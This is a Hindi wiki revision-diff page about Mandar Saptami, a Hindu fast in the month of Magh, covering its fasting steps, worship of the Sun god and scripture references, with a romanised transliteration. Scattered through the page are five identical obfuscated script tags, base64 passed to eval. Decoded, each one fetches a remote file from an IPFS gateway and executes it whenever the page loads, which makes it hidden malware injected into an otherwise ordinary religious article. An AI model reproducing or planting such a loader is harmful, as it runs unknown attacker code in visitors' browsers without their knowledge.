Difference between revisions of "मन्दार सप्तमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*मन्दार सप्तमी माघ शुक्ल सप्तमी को होता है।
 
*मन्दार सप्तमी माघ शुक्ल सप्तमी को होता है।
 
*मन्दार सप्तमी में पंचमी पर हल्का भोजन किया जाता है।
 
*मन्दार सप्तमी में पंचमी पर हल्का भोजन किया जाता है।
 
*इसमें षष्ठी पर उपवास रखा जाता है।  
 
*इसमें षष्ठी पर उपवास रखा जाता है।  
 
*रात्रि में मन्दार पुष्प को खाया जाता।
 
*रात्रि में मन्दार पुष्प को खाया जाता।
*दूसरे दिन [[ब्राह्मण]] को आठ मन्दार पुष्प खिलाये जाते है।
+
*दूसरे दिन [[ब्राह्मण]] को आठ मन्दार पुष्प खिलाये जाते हैं।
 
*मन्दार सप्तमी में [[सूर्य देवता]] की पूजा की जाती है।  
 
*मन्दार सप्तमी में [[सूर्य देवता]] की पूजा की जाती है।  
 
*मन्दर सप्तमी की अन्य बातें और व्रत विधी हेमाद्रि<ref>हेमाद्रि, व्रत॰ 1, 650-652</ref>, [[पद्म पुराण]]<ref>पद्मपुराण, 5|21|292-306 से उद्धरण</ref>, कृत्यकल्पतरु<ref>कृत्यकल्पतरु, व्रत0 219-221</ref>, [[मत्स्य पुराण]]<ref>मत्स्यपुराण (79|1-15)।</ref> में भी है।
 
*मन्दर सप्तमी की अन्य बातें और व्रत विधी हेमाद्रि<ref>हेमाद्रि, व्रत॰ 1, 650-652</ref>, [[पद्म पुराण]]<ref>पद्मपुराण, 5|21|292-306 से उद्धरण</ref>, कृत्यकल्पतरु<ref>कृत्यकल्पतरु, व्रत0 219-221</ref>, [[मत्स्य पुराण]]<ref>मत्स्यपुराण (79|1-15)।</ref> में भी है।
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
+
==टीका टिप्पणी और संदर्भ==
|प्रारम्भिक=
+
<references/>
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==अन्य संबंधित लिंक==
 
==अन्य संबंधित लिंक==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
 
[[Category:व्रत और उत्सव]]
 
[[Category:व्रत और उत्सव]]
 
[[Category:पर्व_और_त्योहार]]
 
[[Category:पर्व_और_त्योहार]]
 
[[Category:संस्कृति कोश]]
 
[[Category:संस्कृति कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 10:20, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • mandar saptami magh shukl saptami ko hota hai.
  • mandar saptami mean panchami par halka bhojan kiya jata hai.
  • isamean shashthi par upavas rakha jata hai.
  • ratri mean mandar pushp ko khaya jata.
  • doosare din brahman ko ath mandar pushp khilaye jate haian.
  • mandar saptami mean soory devata ki pooja ki jati hai.
  • mandar saptami ki any batean aur vrat vidhi hemadri[1], padm puran[2], krityakalpataru[3], matsy puran[4] mean bhi hai.


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri, vrat॰ 1, 650-652
  2. padmapuran, 5|21|292-306 se uddharan
  3. krityakalpataru, vrat0 219-221
  4. matsyapuran (79|1-15).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>